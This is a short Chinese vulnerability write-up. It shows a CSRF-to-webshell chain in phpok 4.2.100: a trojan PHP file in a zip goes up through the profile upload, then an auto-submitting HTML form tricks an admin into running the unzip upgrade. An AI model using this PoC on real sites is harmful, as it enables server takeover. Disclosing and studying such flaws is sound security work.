phpok csrf成功getshell(二)

  • 内容
  • 评论
  • 相关

版本:4.2.100

前台能上传zip文件,而且对升级文件没进行校验。

上传zip演示:

先把我们的木马文件test.php添加到压缩包内test.zip

注册一个帐号-修改资料.

选择一个正常图片,截获数据

QQ截图20150114164820.png

QQ截图20150114165013.png

然后修改数据。

QQ截图20150114165135.png

成功上传zip文件。记录下文件id号。我们这里是739

在 程序升级 » ZIP离线包升级 中的升级操作没有进行Referer验证。导致csrf产生

code 区域
演示csrf:

123.png

poc:

zipfile为我们刚刚记录下的文件id号:739

code 区域
<form action="http://localhost//phpok/admin.php?c=update&f=unzip" id="poc" name="poc" method="post">

<input type="hidden" name="zipfile" value=""/>

<input type="hidden" name="file" value=""/>

<input type="submit" name="up" value="submit"/>

</form>

<script>

var t = document.poc;

t.zipfile.value="739";

t.file.value="739";

document.poc.submit();

</script>

管理员只要访问我们事先准备好的poc。 就能getshell

test.php躺在根目录那里。

访问poc文件

232.png

111.png

评论

0条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注

*

code